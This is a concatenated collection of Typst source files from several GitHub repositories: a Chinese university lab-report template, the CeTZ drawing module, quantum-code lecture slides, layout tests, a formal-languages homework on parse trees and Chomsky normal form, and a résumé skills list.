bottom + right,
dy: 10pt,
[Made with Typst]
)
) |
https://github.com/wangwhh/AETG-algorithm | https://raw.githubusercontent.com/wangwhh/AETG-algorithm/master/report/assets/report-template.typ | typst | #let song = ("Times New Roman", "SimSun")
// #let song = "Source Han Serif SC"
#let san = 16pt
#let xiaosan = 15pt
#let si = 14pt
#let xiaosi = 12pt
#let fake-par = {
v(-1em)
show par: set block(spacing: 0pt)
par("")
}
#let cover(
course: "",
name: "",
college: "",
department: "",
major: "",
id: "",
advisor: "",
date: "",
) = {
let info-key(body) = {
rect(
width: 100%,
height: 23pt,
inset: (x: 0pt, bottom: 1pt),
stroke: none,
align(right)[
#text(
font: song,
size: si,
body,
)],
)
}
let info-value(body) = {
rect(
width: 100%,
height: 23pt,
inset: (x: 0pt, bottom: 1pt),
stroke: (bottom: 0.5pt),
text(
font: song,
size: si,
body,
),
)
}
set align(center)
set text(font: song, size: si, lang: "zh")
pagebreak(weak: true)
v(60pt)
image("logo.svg", width: 50%)
v(20pt)
text(font: song, size: san, weight: "bold")[本科实验报告]
v(50pt)
table(
columns: (75pt, 300pt),
row-gutter: 13pt,
stroke: none,
info-key("课程名称:"), info-value(course),
info-key("姓 名:"), info-value(name),
info-key("学 院:"), info-value(college),
// info-key("系:"), info-value(department),
info-key("专 业:"), info-value(major),
info-key("学 号:"), info-value(id),
info-key("指导教师:"), info-value(advisor),
)
v(50pt)
date
pagebreak(weak: true)
}
#let report-title(
course: "",
type: "",
title: "",
name: "",
major: "",
id: "",
collab: "",
advisor: "",
location: "",
date-year: "",
date-month: "",
date-day: "",
) = {
let info-key(body) = {
rect(
width: 100%,
height: 23pt,
inset: (left: 3pt, bottom: 2pt),
stroke: none,
align(left)[
#text(
font: song,
size: xiaosi,
body,
)],
)
}
let info-value(body) = {
rect(
width: 100%,
inset: (bottom: 2pt),
stroke: (bottom: 0.5pt),
text(
font: song,
size: xiaosi,
body,
),
)
}
set align(center)
set text(font: song, size: xiaosi, lang: "zh")
text(font: "Source Han Serif SC", size: xiaosan, weight: "bold")[浙江大学实验报告]
v(15pt)
table(
columns: (1fr, 51%, 1fr, 21%),
inset: 0pt,
stroke: none,
info-key("课程名称:"), info-value(course),
info-key("实验类型:"), info-value(type),
)
v(-1em)
table(
columns: (1fr, 81%),
inset: 0pt,
stroke: none,
info-key("实验项目名称:"), info-value(title),
)
v(-1em)
table(
columns: (5fr, 15%, 3fr, 33%, 3fr, 21%),
inset: 0pt,
stroke: none,
info-key("学生姓名:"), info-value(name),
info-key("专业:"), info-value(major),
info-key("学号:"), info-value(id),
)
v(-1em)
table(
columns: (7fr, 47%, 5fr, 20%),
inset: 0pt,
stroke: none,
info-key("同组学生姓名:"), info-value(collab),
info-key("指导教师:"), info-value(advisor),
)
v(-1em)
table(
columns: (4fr, 43%, 4fr, 9%, 1fr, 5%, 1fr, 5%, 1fr),
inset: 0pt,
stroke: none,
info-key("实验地点:"), info-value(location),
info-key("实验日期:"),
info-value(date-year), info-key("年"),
info-value(date-month), info-key("月"),
info-value(date-day), info-key("日"),
)
}
#let project(
title: " ",
course: " ",
author: " ",
id: " ",
collaborator: " ",
advisor: " ",
college: " ",
department: " ",
major: " ",
location: " ",
type: " ",
year: 2023,
month: 12,
day: 3,
body
) = {
// Set the document's basic properties.
// set document(author: authors.map(a => a.name), title: title)
cover(
course: course,
name: author,
college: college,
department: department,
major: major,
id: id,
advisor: advisor,
date: [#year] + " 年 " + [#month] + " 月 " + [#day] + " 日 ",
)
set page(numbering: (..numbers) => {
if numbers.pos().at(0) > 1 {
numbering("1", numbers.pos().at(0) - 1)
}
})
set text(font: "Linux Libertine", lang: "en")
// report-title(
// course: course,
// type: type,
// title: title,
// name: author,
// major: major,
// id: id,
// collab: collaborator,
// advisor: advisor,
// location: location,
// date-year: [#year],
// date-month: [#month],
// date-day: [#day],
// )
set par(
first-line-indent: 1em,
justify: true
)
set heading(numbering: "1.1 ")
set list(indent: 1em, body-indent: 1em)
set enum(indent: 1em, body-indent: 1em)
show heading: it => {
it
v(5pt)
fake-par
}
show terms: it => {
set par(first-line-indent: 0pt)
set terms(indent: 10pt, hanging-indent: 9pt)
it
fake-par
}
show raw: text.with(font: ("Lucida Sans Typewriter", "Source Han Sans HW SC"))
show raw.where(block: true): it => {
it
fake-par
}
show enum: it => {
it
fake-par
}
show list: it => {
it
fake-par
}
show figure: it => {
it
fake-par
}
show table: it => {
it
fake-par
}
body
}
#let code(
// caption: none, // content of caption bubble (string, none)
bgcolor: white, // back ground color (color)
strokecolor: black, // frame color (color)
hlcolor: auto, // color to use for highlighted lines (auto, color)
width: 100%,
radius: 3pt,
inset: 5pt,
numbers: false, // show line numbers (boolean)
stepnumber: 1, // only number lines divisible by stepnumber (integer)
numberfirstline: false, // if the firstline isn't divisible by stepnumber, force it to be numbered anyway (boolean)
numberstyle: auto, // style function to apply to line numbers (auto, style)
firstnumber: 1, // number of the first line (integer)
highlight: none, // line numbers to highlight (none, array of integer)
content
) = {
if type(hlcolor) == "auto" {
hlcolor = bgcolor.darken(10%)
}
if type(highlight) == "none" {
highlight = ()
}
block(
width: width,
fill: bgcolor,
stroke: strokecolor,
radius: radius,
inset: inset,
clip: false,
{
let (columns, align, make_row) = {
if numbers {
// line numbering requested
if type(numberstyle) == "auto" {
numberstyle = text.with(style: "italic",
slashed-zero: true,
size: .6em)
}
( ( auto, 1fr ),
( right + horizon, left ),
e => {
let (i, l) = e
let n = i + firstnumber
let n_str = if (calc.rem(n, stepnumber) == 0) or (numberfirstline and i == 0) { numberstyle(str(n)) } else { none }
(n_str + h(.5em), raw(lang: content.lang, l))
}
)
} else {
( ( 1fr, ),
( left, ),
e => {
let (i, l) = e
raw( lang:content.lang, l)
}
)
}
}
table(
stroke:none,
columns: columns,
rows: (auto,),
gutter: 0pt,
inset: 2pt,
align: (col, _) => align.at(col),
fill: (c, row) => if (row / 2 + firstnumber) in highlight { hlcolor } else { none },
..content
.text
.split("\n")
.enumerate()
.map(make_row)
.flatten()
.map(c => if c.has("text") and c.text == "" { v(1em) } else { c })
)
}
)
} |
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/cetz/0.2.0/src/drawable.typ | typst | Apache License 2.0 | #import "path-util.typ"
#import "vector.typ"
#import "util.typ"
#import "path-util.typ"
#let apply-transform(transform, drawables) = {
if type(drawables) == dictionary {
drawables = (drawables,)
}
if drawables.len() == 0 {
return ()
}
for drawable in drawables {
assert(type(drawable) != array,
message: "Expected drawable, got array: " + repr(drawable))
if drawable.type == "path" {
drawable.segments = drawable.segments.map(s => {
return (s.at(0),) + util.apply-transform(transform, ..s.slice(1))
})
} else if drawable.type == "content" {
drawable.pos = util.apply-transform(transform, drawable.pos)
} else {
panic()
}
(drawable,)
}
}
#let path(close: false, fill: none, stroke: none, segments) = {
let segments = segments
// Handle case where only one segment has been passed
if type(segments.first()) == str {
segments = (segments,)
}
if close {
segments.push(path-util.line-segment((
path-util.segment-end(segments.last()),
path-util.segment-start(segments.first()),
)))
}
return (
type: "path",
close: close,
segments: segments,
fill: fill,
stroke: stroke,
hidden: false
)
}
#let content(pos, width, height, border, body) = {
return (
type: "content",
pos: pos,
width: width,
height: height,
segments: border,
body: body,
hidden: false,
)
}
#let ellipse(x, y, z, rx, ry, fill: none, stroke: none) = {
let m = 0.551784
let mx = m * rx
let my = m * ry
let left = x - rx
let right = x + rx
let top = y + ry
let bottom = y - ry
path(
(
path-util.cubic-segment(
(x, top, z),
(right, y, z),
(x + m * rx, top, z),
(right, y + m * ry, z),
),
path-util.cubic-segment(
(right, y, z),
(x, bottom, z),
(right, y - m * ry, z),
(x + m * rx, bottom, z),
),
path-util.cubic-segment(
(x, bottom, z),
(left, y, z),
(x - m * rx, bottom, z),
(left, y - m * ry, z),
),
path-util.cubic-segment((left, y, z), (x, top, z), (left, y + m * ry, z), (x - m * rx, top, z)),
),
stroke: stroke,
fill: fill,
close: true,
)
}
#let arc(x, y, z, start, stop, rx, ry, mode: "OPEN", fill: none, stroke: none) = {
let delta = calc.max(-360deg, calc.min(stop - start, 360deg))
let num-curves = calc.max(1, calc.min(calc.ceil(calc.abs(delta) / 90deg), 4))
// Move x/y to the center
x -= rx * calc.cos(start)
y -= ry * calc.sin(start)
// Calculation of control points is based on the method described here:
// https://pomax.github.io/bezierinfo/#circles_cubic
let segments = ()
for n in range(0, num-curves) {
let start = start + delta / num-curves * n
let stop = start + delta / num-curves
let d = delta / num-curves
let k = 4 / 3 * calc.tan(d / 4)
let sx = x + rx * calc.cos(start)
let sy = y + ry * calc.sin(start)
let ex = x + rx * calc.cos(stop)
let ey = y + ry * calc.sin(stop)
let s = (sx, sy, z)
let c1 = (
x + rx * (calc.cos(start) - k * calc.sin(start)),
y + ry * (calc.sin(start) + k * calc.cos(start)),
z,
)
let c2 = (
x + rx * (calc.cos(stop) + k * calc.sin(stop)),
y + ry * (calc.sin(stop) - k * calc.cos(stop)),
z,
)
let e = (ex, ey, z)
segments.push(path-util.cubic-segment(s, e, c1, c2))
}
if mode == "PIE" and calc.abs(delta) < 360deg {
segments.push(path-util.line-segment((
path-util.segment-end(segments.last()),
(x, y, z),
path-util.segment-start(segments.first()))))
}
return path(
fill: fill,
stroke: stroke,
close: mode != "OPEN",
segments
)
}
|
https://github.com/jackkyyh/ZXCSS | https://raw.githubusercontent.com/jackkyyh/ZXCSS/main/scripts/2_encoder.typ | typst | #import "../import.typ": *
#slide(title: [CSS codes])[
/ CSS codes: stabilizer codes whose stabilizers can be divided into\ 2 types: *X-type* or *Z-type*.
]
#slide(title: [CSS codes])[
$cal(S)=angle.l Z Z I, Z I Z angle.r$
$cal(S)=angle.l Z Z, X X angle.r$
$cal(S)=angle.l Z Z Z Z, X X X X angle.r$
#pause
$cal(S)=angle.l X Z Z X I, I X Z Z X, X I X Z Z, Z X I X Z angle.r$
]
#slide(title: [CSS codes])[
#write_footer[<NAME>. (2022). Phase-free ZX diagrams are CSS codes (... or how to graphically grok the surface code). arXiv preprint arXiv:2204.14038.]
/ CSS codes: stabilizer codes whose stabilizers can be divided into\ 2 types: *X-type* or *Z-type*.
#pause
#align(center)[#cbox[Every CSS code encoder is a phase-free ZX diagram.]]
]
#slide(title: [Encoders as ZX diagrams])[
#grid(columns: (450pt, 1fr))[
Stabilizers of the *Steane code*:
#h(20pt)
#box[#grid(columns: (160pt, auto))[
#uncover(1, mode:"transparent")[$Z_1 Z_3 Z_5 Z_7\ Z_2 Z_3 Z_6 Z_7\ Z_4 Z_5 Z_6 Z_7$]
][$#uncover("1, 3-", mode:"transparent")[$X_1 X_3 X_5 X_7$]\
#uncover("1, 4-", mode:"transparent")[$X_2 X_3 X_6 X_7$]\
#uncover("1, 5-", mode:"transparent")[$X_4 X_5 X_6 X_7$]$
]]
Logical Pauli operators:
#h(20pt)
#box[#grid(columns: (160pt, auto))[
#uncover(1, mode:"transparent")[$overline(Z)=Z_1 Z_4 Z_5$]
][
#uncover("1, 6-", mode:"transparent")[$overline(X)=X_1 X_4 X_5$]
]]
][
#alternatives(position: right)[][
#image("../figs/steane/zx col 0.svg", height: 250pt)][
#image("../figs/steane/zx col 1.svg", height: 250pt)][
#image("../figs/steane/zx col 2.svg", height: 250pt)][
#image("../figs/steane/zx col 3.svg", height: 250pt)][
#image("../figs/steane/zx col.svg", height: 250pt)]
]
]
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/layout/page-number-align_00.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
#set page(
height: 100pt,
margin: 30pt,
numbering: "(1)",
number-align: top + right,
)
#block(width: 100%, height: 100%, fill: aqua.lighten(50%))
|
https://github.com/ofurtumi/formleg | https://raw.githubusercontent.com/ofurtumi/formleg/main/h05/H5.typ | typst | #import "@templates/ass:0.1.1": *
#show: doc => template(
project: "Homework 5",
class: "Töl301G",
doc
)
#set heading(numbering: "1a.")
= Parse trees and derivations
==
#align(center + horizon, [#image("../imgs/h5-v1-a.png", height: 100pt) $E -> T -> F -> a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-b.png", height: 100pt) $E -> E + T -> T + F -> F + a -> a + a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-c.png", height: 100pt) $E -> E + T -> E + T + F -> T + F + a -> F + a + a -> a + a + a$])
==
#align(center + horizon, [#image("../imgs/h5-v1-d.png", height: 100pt) $E -> T -> F -> (E) -> (T) -> (F) -> ((E)) -> ((T)) -> ((F)) -> ((a))$])
#pagebreak()
= Chomsky
#grid(columns: (1fr, 1fr, 1fr, 1fr), gutter: 16pt,
[ Let's start by adding a new state $A_0$ and a rule $A_0 -> A$; we now have the states: ],
[ Now we remove $B->epsilon$ and get: ],
[ Now we remove $A->epsilon$ and get: ],
[ Now we eliminate $A->A$ and get: ],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> epsilon\
B &-> 00\
B &-> epsilon
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> epsilon\
A &-> B A\
A &-> A B\
A &-> A\
B &-> 00\
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> A\
A &-> B B\
A &-> B\
B &-> 00\
$],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> B\
B &-> 00\
$],
[Now we eliminate $A->B$ and get:],
[Now we eliminate $A_0->A$ and get:],
[Now we eliminate all right hand variables longer than 2 and get:],
[Finally we replace terminals longer than 1 with variables and get:],[
$
A_0 &-> A\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
$],[
$
A_0 &-> B A B\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B A B\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
$],[
$
A_0 &-> B X\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B X\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> 00\
B &-> 00\
X &-> A B\
$],[
$
A_0 &-> B X\
A_0 &-> 1\
A_0 &-> B A\
A_0 &-> A B\
A_0 &-> B B\
A_0 &-> 00\
A &-> B X\
A &-> 1\
A &-> B A\
A &-> A B\
A &-> B B\
A &-> Y Y\
B &-> Y Y\
X &-> A B\
Y &-> 0
$]
)
Final form:
$
A_0 &-> B X | B A | A B | B B | Y Y | 1\
A &-> B X | B A | A B | B B | Y Y | 1\
B &-> Y Y\
X &-> A B\
Y &-> 0
$
#pagebreak()
= Show that i,j,k apples are context free
We can show that this is context free by creating a CFG that generates the language.
We start by creating a CFG for the left-hand-side apples: we want to be able to get infinitely many or no apples and finally end on a plus that leads into the right-hand side. We'll say that $S -> a A$ and $A -> a A | + B$
Now let's do the right-hand side. It's similar to the left side: infinitely many or no apples, but now we want the number of apples before $=$ to match or exceed the number after it. We start by defining a new transition $S -> + a B$ and define $B -> a B a | a B | =$
We end up with the following CFG:
$
S &-> a A\
S &-> + a B\
A &-> a A\
A &-> + B\
B &-> a B\
B &-> a B a \
B &-> =
$
|
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/fuzzers/corpora/visualize/gradient-text_01.typ | typst | Apache License 2.0 |
#import "/contrib/templates/std-tests/preset.typ": *
#show: test-page
// Test that gradient fills on text work for globally defined gradients.
#set page(width: 200pt, height: auto, margin: 10pt, background: {
rect(width: 100%, height: 30pt, fill: gradient.linear(red, blue))
})
#set par(justify: true)
#set text(fill: gradient.linear(red, blue))
#lorem(30)
|
https://github.com/Gavinok/typst-res | https://raw.githubusercontent.com/Gavinok/typst-res/master/skills.typ | typst | #import "layout.typ": skill_set
#skill_set("Programming Languages")[
Java, C++, Python, TypeScript, Bash, Common Lisp, Clojure, and ClojureScript
]
#skill_set("Office Software")[
Adobe Photoshop, Inkscape, Blender, and Microsoft Office
]
#skill_set("Frameworks and Databases")[
Agile,
Selenium,
CRUD,
JUnit,
Jest,
Mokito,
React,
Postgres,
and SQLite
]
#skill_set("Tools")[
Git,
Linux,
Jenkins,
Docker,
docker-compose,
Kubernetes,
Jira,
Gradle,
CMake,
Maven,
NodeJS,
GNU Make,
Vim,
Gitlab,
Github,
Wireshark,
and GDB
]
|